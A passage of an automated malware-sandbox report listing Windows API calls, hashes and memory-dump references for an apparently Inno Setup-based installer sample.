                                                          • Opcode Fuzzy Hash: 06d429211cbdde73cb23459f0bbdb60b04e95dac6161286f70ab338dbad9895d
                                                          • Instruction Fuzzy Hash: C3E092B0A056008BCB14DF3A898031A7AD29FC9324F04C56AEC9CCF3D7E63DC8594A27
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(00494EF2,?,00494F14,?,?,00000000,00494EF2,?,?), ref: 00414693
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F14
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                          • Instruction ID: cfde3e3822fa8edba560b3c3045b88a59d445a8db7eea6df610edd37a4bd72e7
                                                          • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                          • Instruction Fuzzy Hash: A3D012722081516AD220965AAC44EAB6BDCCBC5770F11063AB558C2181D7609C01C675
                                                          APIs
                                                            • Part of subcall function 004235F0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423605
                                                          • ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                            • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$ShowWindow
                                                          • String ID:
                                                          • API String ID: 3202724764-0
                                                          • Opcode ID: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                          • Instruction ID: ebc5fdb8686796c5fd5eba84b5ab6671b787b6de9fbea9510ee25edb69bb1d0b
                                                          • Opcode Fuzzy Hash: fce0b26c2d9ed10aeec85bb6dc1e2ec36172a6d8969be9752991d6a22a5a0e05
                                                          • Instruction Fuzzy Hash: 7CD05E123412703182307ABB384598B46AC8D922A6749043BB4448B347ED5DCE1110BC
                                                          APIs
                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                          • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                          • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                          • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                          • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                          • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                          • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                          • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                          APIs
                                                          • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 734332943-0
                                                          APIs
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CurrentDirectory
                                                          • String ID:
                                                          • API String ID: 1611563598-0
                                                          APIs
                                                          • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 626452242-0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003C84,00007C87,00401973), ref: 00401766
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          APIs
                                                          • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                          • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                          • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                          • API String ID: 2323315520-3614243559
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0045844F
                                                          • QueryPerformanceCounter.KERNEL32(02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 00458458
                                                          • GetSystemTimeAsFileTime.KERNEL32(02213858,02213858), ref: 00458462
                                                          • GetCurrentProcessId.KERNEL32(?,02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 0045846B
                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02213858,02213858), ref: 004584EF
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                          • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                          • API String ID: 770386003-3271284199
                                                          APIs
                                                            • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                            • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                            • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                            • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8), ref: 00477E60
                                                            • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                            • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02212BD8,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                          • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                          • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                          Strings
                                                          Similarity
                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                          • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                          • API String ID: 883996979-2356621170
                                                          APIs
                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                          Similarity
                                                          • API ID: MessageSendShowWindow
                                                          • String ID:
                                                          • API String ID: 1631623395-0
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 0041838B
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                          • GetWindowRect.USER32(?), ref: 004183C4
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                          • ScreenToClient.USER32(00000000), ref: 004183F0
                                                          • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                          • String ID: ,
                                                          • API String ID: 2266315723-3772416878
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                          Strings
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 107509674-3733053543
                                                          APIs
                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc$CryptVersion
                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                          • API String ID: 1951258720-508647305
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                          • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                          Strings
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                          • String ID: isRS-$isRS-???.tmp
                                                          • API String ID: 134685335-3422211394
                                                          APIs
                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                          • SetForegroundWindow.USER32(?), ref: 00457469
                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                          Strings
                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                          Similarity
                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                          • API String ID: 2236967946-3182603685
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                          • API String ID: 1646373207-3712701948
                                                          APIs
                                                          • IsIconic.USER32(?), ref: 00417D07
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Placement$Iconic
                                                          • String ID: ,
                                                          • API String ID: 568898626-3772416878
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                          • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                          Similarity
                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                          • String ID:
                                                          • API String ID: 4011626565-0
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                          • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                          • String ID:
                                                          • API String ID: 4011626565-0
                                                          • Opcode ID: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                          • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                          • Opcode Fuzzy Hash: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                          • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
